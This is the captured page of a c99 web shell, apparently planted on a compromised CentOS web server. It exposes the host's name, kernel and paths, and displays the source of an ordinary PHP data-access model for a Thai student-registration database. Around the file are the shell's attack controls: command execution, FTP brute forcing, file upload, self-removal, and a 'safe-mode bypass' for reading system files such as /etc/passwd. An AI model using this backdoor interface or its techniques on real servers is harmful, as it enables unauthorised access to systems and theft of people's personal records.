!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/models/eregis-13022565/   drwxrwxrwx
Free 50.99 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     da_rg_RealStudentAd.php (15.21 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

include_once("my_model.php");

class 
Da_rg_RealStudentAd extends My_model {        
    
    
// PK is 
    
    
public $app_year;
    public 
$app_at_id;
    public 
$at_name;
    public 
$app_type;
    public 
$app_sub_type;
    public 
$app_pf_id;
    public 
$pf_name;
    public 
$app_name;
    public 
$app_lname;
    public 
$app_idcard;
    public 
$app_number;
    public 
$ul_email;
    public 
$app_birthday;
    public 
$app_age;
    public 
$app_tall;
    public 
$app_old_name;
    public 
$app_old_lname;
    public 
$app_housenum;
    public 
$app_housegrp;
    public 
$app_soi;
    public 
$app_road;
    public 
$app_dt_id;
    public 
$app_dt_name;
    public 
$app_ap_id;
    public 
$app_ap_name;
    public 
$app_prv_id;
    public 
$app_prv_name;
    public 
$app_postcode;
    public 
$app_phone;
    public 
$app_cont_housenum;
    public 
$app_cont_housegrp;
    public 
$app_cont_soi;
    public 
$app_cont_road;
    public 
$app_cont_dt_id;
    public 
$app_cont_dt_name;
    public 
$app_cont_ap_id;
    public 
$app_cont_ap_name;
    public 
$app_cont_prv_id;
    public 
$app_cont_prv_name;
    public 
$app_cont_postcode;
    public 
$app_cont_phone;
    public 
$app_cont_name1;
    public 
$app_cont_lname1;
    public 
$app_cont_phone1;
    public 
$app_cont_name2;
    public 
$app_cont_lname2;
    public 
$app_cont_phone2;
    public 
$app_cont_name3;
    public 
$app_cont_lname3;
    public 
$app_cont_phone3;
    public 
$app_place_interview;
    public 
$place_interview;
    public 
$app_score;
    public 
$dt1_ht_id;
    public 
$ht_name;
    public 
$dt1_ht_name;
    public 
$dt1_ht_lname;
    public 
$dt1_ht_housenum;
    public 
$dt1_ht_housegrp;
    public 
$dt1_ht_road;
    public 
$dt1_ht_soi;
    public 
$dt1_ht_dt_id;
    public 
$dt1_ht_dt_name;
    public 
$dt1_ht_ap_id;
    public 
$dt1_ht_ap_name;
    public 
$dt1_ht_prv_id;
    public 
$dt1_ht_prv_name;
    public 
$dt1_ht_postcode;
    public 
$dt1_ht_phone;
    public 
$dt1_vt_id;
    public 
$vt_name;
    public 
$dt1_vt_idcard;
    public 
$dt1_vt_name;
    public 
$dt1_vt_prv_id;
    public 
$dt1_vt_prv_name;
    public 
$dt1_scholarship;
    public 
$dt1_childofficial;
    public 
$dt1_year_end;
    public 
$dt1_gpax;
    public 
$dt21_date_start;
    public 
$dt21_year_end;
    public 
$dt21_gpax;
    public 
$dt21_vt_level;
    public 
$vl_name;
    public 
$dt22_date_start;
    public 
$dt22_post;
    public 
$pd22_name;
    public 
$dt22_off_idcard;
    public 
$dt22_department;
    public 
$dt22_ministry;
    public 
$dt22_ministry_name;
    public 
$dt22_year_end;
    public 
$dt22_gpax;
    public 
$dt23_date_start;
    public 
$dt23_post;
    public 
$pd23_name;
    public 
$dt23_off_idcard;
    public 
$dt23_department;
    public 
$dt23_ministry;
    public 
$dt23_ministry_name;
    public 
$dt23_year_end;
    public 
$dt23_gpax;
    public 
$dt24_date_start;
    public 
$dt24_off_idcard;
    public 
$dt24_department;
    public 
$dt24_ministry;
    public 
$dt24_ministry_name;
    public 
$dt24_graduate;
    public 
$gd24_name;
    public 
$dt24_year_end;
    public 
$dt24_gpax;
    public 
$dt25_date_start;
    public 
$dt25_off_idcard;
    public 
$dt25_department;
    public 
$dt25_ministry;
    public 
$dt25_ministry_name;
    public 
$dt25_graduate;
    public 
$gd25_name;
    public 
$dt25_year_end;
    public 
$dt25_gpax;
    public 
$dt26_date_start;
    public 
$dt26_off_idcard;
    public 
$dt26_department;
    public 
$dt26_ministry;
    public 
$dt26_ministry_name;
    public 
$dt26_year_end;
    public 
$dt26_gpax;
    public 
$itv_prv_id;
    public 
$itv_prv_name;
    public 
$itv_ap_id;
    public 
$itv_ap_name;
    public 
$itv_crs_id;
    public 
$crs_name;
    public 
$itv_qt_id;
    public 
$qt_name;
    public 
$itv_clg_id;
    public 
$itv_clg_name;
    public 
$app_result_status;
    public 
$curId;
    public 
$createUsLogin;
    public 
$updateDateTime;

    public 
$last_insert_id;
    
    function 
Da_rg_RealStudentAd() {
        
parent::__construct();
        
$this->load->database('rg'TRUE);
    }

    function 
insert() {
        
// if there is no auto_increment field, please remove it
        
$sql "INSERT INTO $this->rg_dbname.rg_RealStudentAd (app_year, app_at_id, at_name, app_type, app_sub_type, app_pf_id, pf_name, app_name, app_lname, app_idcard, app_number, ul_email, app_birthday, app_age, app_tall, app_old_name, app_old_lname, app_housenum, app_housegrp, app_soi, app_road, app_dt_id, app_dt_name, app_ap_id, app_ap_name, app_prv_id, app_prv_name, app_postcode, app_phone, app_cont_housenum, app_cont_housegrp, app_cont_soi, app_cont_road, app_cont_dt_id, app_cont_dt_name, app_cont_ap_id, app_cont_ap_name, app_cont_prv_id, app_cont_prv_name, app_cont_postcode, app_cont_phone, app_cont_name1, app_cont_lname1, app_cont_phone1, app_cont_name2, app_cont_lname2, app_cont_phone2, app_cont_name3, app_cont_lname3, app_cont_phone3, app_place_interview, place_interview, app_score, dt1_ht_id, ht_name, dt1_ht_name, dt1_ht_lname, dt1_ht_housenum, dt1_ht_housegrp, dt1_ht_road, dt1_ht_soi, dt1_ht_dt_id, dt1_ht_dt_name, dt1_ht_ap_id, dt1_ht_ap_name, dt1_ht_prv_id, dt1_ht_prv_name, dt1_ht_postcode, dt1_ht_phone, dt1_vt_id, vt_name, dt1_vt_idcard, dt1_vt_name, dt1_vt_prv_id, dt1_vt_prv_name, dt1_scholarship, dt1_childofficial, dt1_year_end, dt1_gpax, dt21_date_start, dt21_year_end, dt21_gpax, dt21_vt_level, vl_name, dt22_date_start, dt22_post, pd22_name, dt22_off_idcard, dt22_department, dt22_ministry, dt22_ministry_name, dt22_year_end, dt22_gpax, dt23_date_start, dt23_post, pd23_name, dt23_off_idcard, dt23_department, dt23_ministry, dt23_ministry_name, dt23_year_end, dt23_gpax, dt24_date_start, dt24_off_idcard, dt24_department, dt24_ministry, dt24_ministry_name, dt24_graduate, gd24_name, dt24_year_end, dt24_gpax, dt25_date_start, dt25_off_idcard, dt25_department, dt25_ministry, dt25_ministry_name, dt25_graduate, gd25_name, dt25_year_end, dt25_gpax, dt26_date_start, dt26_off_idcard, dt26_department, dt26_ministry, dt26_ministry_name, dt26_year_end, dt26_gpax, itv_prv_id, itv_prv_name, itv_ap_id, itv_ap_name, itv_crs_id, crs_name, itv_qt_id, qt_name, itv_clg_id, itv_clg_name, app_result_status, curId, createUsLogin, updateDateTime)
                VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)"
;
        
$this->db->query($sql, array($this->app_year$this->app_at_id$this->at_name$this->app_type$this->app_sub_type$this->app_pf_id$this->pf_name$this->app_name$this->app_lname$this->app_idcard$this->app_number$this->ul_email$this->app_birthday$this->app_age$this->app_tall$this->app_old_name$this->app_old_lname$this->app_housenum$this->app_housegrp$this->app_soi$this->app_road$this->app_dt_id$this->app_dt_name$this->app_ap_id$this->app_ap_name$this->app_prv_id$this->app_prv_name$this->app_postcode$this->app_phone$this->app_cont_housenum$this->app_cont_housegrp$this->app_cont_soi$this->app_cont_road$this->app_cont_dt_id$this->app_cont_dt_name$this->app_cont_ap_id$this->app_cont_ap_name$this->app_cont_prv_id$this->app_cont_prv_name$this->app_cont_postcode$this->app_cont_phone$this->app_cont_name1$this->app_cont_lname1$this->app_cont_phone1$this->app_cont_name2$this->app_cont_lname2$this->app_cont_phone2$this->app_cont_name3$this->app_cont_lname3$this->app_cont_phone3$this->app_place_interview$this->place_interview$this->app_score$this->dt1_ht_id$this->ht_name$this->dt1_ht_name$this->dt1_ht_lname$this->dt1_ht_housenum$this->dt1_ht_housegrp$this->dt1_ht_road$this->dt1_ht_soi$this->dt1_ht_dt_id$this->dt1_ht_dt_name$this->dt1_ht_ap_id$this->dt1_ht_ap_name$this->dt1_ht_prv_id$this->dt1_ht_prv_name$this->dt1_ht_postcode$this->dt1_ht_phone$this->dt1_vt_id$this->vt_name$this->dt1_vt_idcard$this->dt1_vt_name$this->dt1_vt_prv_id$this->dt1_vt_prv_name$this->dt1_scholarship$this->dt1_childofficial$this->dt1_year_end$this->dt1_gpax$this->dt21_date_start$this->dt21_year_end$this->dt21_gpax$this->dt21_vt_level$this->vl_name$this->dt22_date_start$this->dt22_post$this->pd22_name$this->dt22_off_idcard$this->dt22_department$this->dt22_ministry$this->dt22_ministry_name$this->dt22_year_end$this->dt22_gpax$this->dt23_date_start$this->dt23_post$this->pd23_name$this->dt23_off_idcard$this->dt23_department$this->dt23_ministry$this->dt23_ministry_name$this->dt23_year_end$this->dt23_gpax$this->dt24_date_start$this->dt24_off_idcard$this->dt24_department$this->dt24_ministry$this->dt24_ministry_name$this->dt24_graduate$this->gd24_name$this->dt24_year_end$this->dt24_gpax$this->dt25_date_start$this->dt25_off_idcard$this->dt25_department$this->dt25_ministry$this->dt25_ministry_name$this->dt25_graduate$this->gd25_name$this->dt25_year_end$this->dt25_gpax$this->dt26_date_start$this->dt26_off_idcard$this->dt26_department$this->dt26_ministry$this->dt26_ministry_name$this->dt26_year_end$this->dt26_gpax$this->itv_prv_id$this->itv_prv_name$this->itv_ap_id$this->itv_ap_name$this->itv_crs_id$this->crs_name$this->itv_qt_id$this->qt_name$this->itv_clg_id$this->itv_clg_name$this->app_result_status$this->curId$this->createUsLogin$this->updateDateTime));
        
$this->last_insert_id $this->db->insert_id();
    }
    
    function 
update() {
        
// if there is no primary key, please remove WHERE clause.
        
$sql "UPDATE $this->rg_dbname.rg_RealStudentAd 
                SET    app_year=?, app_at_id=?, at_name=?, app_type=?, app_sub_type=?, app_pf_id=?, pf_name=?, app_name=?, app_lname=?, app_idcard=?, app_number=?, ul_email=?, app_birthday=?, app_age=?, app_tall=?, app_old_name=?, app_old_lname=?, app_housenum=?, app_housegrp=?, app_soi=?, app_road=?, app_dt_id=?, app_dt_name=?, app_ap_id=?, app_ap_name=?, app_prv_id=?, app_prv_name=?, app_postcode=?, app_phone=?, app_cont_housenum=?, app_cont_housegrp=?, app_cont_soi=?, app_cont_road=?, app_cont_dt_id=?, app_cont_dt_name=?, app_cont_ap_id=?, app_cont_ap_name=?, app_cont_prv_id=?, app_cont_prv_name=?, app_cont_postcode=?, app_cont_phone=?, app_cont_name1=?, app_cont_lname1=?, app_cont_phone1=?, app_cont_name2=?, app_cont_lname2=?, app_cont_phone2=?, app_cont_name3=?, app_cont_lname3=?, app_cont_phone3=?, app_place_interview=?, place_interview=?, app_score=?, dt1_ht_id=?, ht_name=?, dt1_ht_name=?, dt1_ht_lname=?, dt1_ht_housenum=?, dt1_ht_housegrp=?, dt1_ht_road=?, dt1_ht_soi=?, dt1_ht_dt_id=?, dt1_ht_dt_name=?, dt1_ht_ap_id=?, dt1_ht_ap_name=?, dt1_ht_prv_id=?, dt1_ht_prv_name=?, dt1_ht_postcode=?, dt1_ht_phone=?, dt1_vt_id=?, vt_name=?, dt1_vt_idcard=?, dt1_vt_name=?, dt1_vt_prv_id=?, dt1_vt_prv_name=?, dt1_scholarship=?, dt1_childofficial=?, dt1_year_end=?, dt1_gpax=?, dt21_date_start=?, dt21_year_end=?, dt21_gpax=?, dt21_vt_level=?, vl_name=?, dt22_date_start=?, dt22_post=?, pd22_name=?, dt22_off_idcard=?, dt22_department=?, dt22_ministry=?, dt22_ministry_name=?, dt22_year_end=?, dt22_gpax=?, dt23_date_start=?, dt23_post=?, pd23_name=?, dt23_off_idcard=?, dt23_department=?, dt23_ministry=?, dt23_ministry_name=?, dt23_year_end=?, dt23_gpax=?, dt24_date_start=?, dt24_off_idcard=?, dt24_department=?, dt24_ministry=?, dt24_ministry_name=?, dt24_graduate=?, gd24_name=?, dt24_year_end=?, dt24_gpax=?, dt25_date_start=?, dt25_off_idcard=?, dt25_department=?, dt25_ministry=?, dt25_ministry_name=?, dt25_graduate=?, gd25_name=?, dt25_year_end=?, dt25_gpax=?, dt26_date_start=?, dt26_off_idcard=?, dt26_department=?, dt26_ministry=?, dt26_ministry_name=?, dt26_year_end=?, dt26_gpax=?, itv_prv_id=?, itv_prv_name=?, itv_ap_id=?, itv_ap_name=?, itv_crs_id=?, crs_name=?, itv_qt_id=?, qt_name=?, itv_clg_id=?, itv_clg_name=?, app_result_status=?, curId=?, createUsLogin=?, updateDateTime=? 
                WHERE app_year=? AND app_idcard=?"
;    
        
$this->db->query($sql, array($this->app_year$this->app_at_id$this->at_name$this->app_type$this->app_sub_type$this->app_pf_id$this->pf_name$this->app_name$this->app_lname$this->app_idcard$this->app_number$this->ul_email$this->app_birthday$this->app_age$this->app_tall$this->app_old_name$this->app_old_lname$this->app_housenum$this->app_housegrp$this->app_soi$this->app_road$this->app_dt_id$this->app_dt_name$this->app_ap_id$this->app_ap_name$this->app_prv_id$this->app_prv_name$this->app_postcode$this->app_phone$this->app_cont_housenum$this->app_cont_housegrp$this->app_cont_soi$this->app_cont_road$this->app_cont_dt_id$this->app_cont_dt_name$this->app_cont_ap_id$this->app_cont_ap_name$this->app_cont_prv_id$this->app_cont_prv_name$this->app_cont_postcode$this->app_cont_phone$this->app_cont_name1$this->app_cont_lname1$this->app_cont_phone1$this->app_cont_name2$this->app_cont_lname2$this->app_cont_phone2$this->app_cont_name3$this->app_cont_lname3$this->app_cont_phone3$this->app_place_interview$this->place_interview$this->app_score$this->dt1_ht_id$this->ht_name$this->dt1_ht_name$this->dt1_ht_lname$this->dt1_ht_housenum$this->dt1_ht_housegrp$this->dt1_ht_road$this->dt1_ht_soi$this->dt1_ht_dt_id$this->dt1_ht_dt_name$this->dt1_ht_ap_id$this->dt1_ht_ap_name$this->dt1_ht_prv_id$this->dt1_ht_prv_name$this->dt1_ht_postcode$this->dt1_ht_phone$this->dt1_vt_id$this->vt_name$this->dt1_vt_idcard$this->dt1_vt_name$this->dt1_vt_prv_id$this->dt1_vt_prv_name$this->dt1_scholarship$this->dt1_childofficial$this->dt1_year_end$this->dt1_gpax$this->dt21_date_start$this->dt21_year_end$this->dt21_gpax$this->dt21_vt_level$this->vl_name$this->dt22_date_start$this->dt22_post$this->pd22_name$this->dt22_off_idcard$this->dt22_department$this->dt22_ministry$this->dt22_ministry_name$this->dt22_year_end$this->dt22_gpax$this->dt23_date_start$this->dt23_post$this->pd23_name$this->dt23_off_idcard$this->dt23_department$this->dt23_ministry$this->dt23_ministry_name$this->dt23_year_end$this->dt23_gpax$this->dt24_date_start$this->dt24_off_idcard$this->dt24_department$this->dt24_ministry$this->dt24_ministry_name$this->dt24_graduate$this->gd24_name$this->dt24_year_end$this->dt24_gpax$this->dt25_date_start$this->dt25_off_idcard$this->dt25_department$this->dt25_ministry$this->dt25_ministry_name$this->dt25_graduate$this->gd25_name$this->dt25_year_end$this->dt25_gpax$this->dt26_date_start$this->dt26_off_idcard$this->dt26_department$this->dt26_ministry$this->dt26_ministry_name$this->dt26_year_end$this->dt26_gpax$this->itv_prv_id$this->itv_prv_name$this->itv_ap_id$this->itv_ap_name$this->itv_crs_id$this->crs_name$this->itv_qt_id$this->qt_name$this->itv_clg_id$this->itv_clg_name$this->app_result_status$this->curId$this->createUsLogin$this->updateDateTime$this->app_year$this->app_idcard));
    }
    
    function 
delete() {
        
// if there is no primary key, please remove WHERE clause.
        
$sql "DELETE FROM $this->rg_dbname.rg_RealStudentAd
                WHERE "
;
        
$this->db->query($sql, array());
    }
    
    
/*
     * You have to assign primary key value before call this function.
     */
    
function get_by_key($withSetAttributeValue=FALSE) {    
        
$sql "SELECT * 
                FROM $this->rg_dbname.rg_RealStudentAd 
                WHERE app_year=? AND app_idcard=?"
;
        
$query $this->db->query($sql, array($this->app_year$this->app_idcard));
        if ( 
$withSetAttributeValue ) {
            
$this->row2attribute$query->row() );
        } else {
            return 
$query ;
        }
    }
    
}     
//=== end class Da_rg_realstudentad
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0133 ]--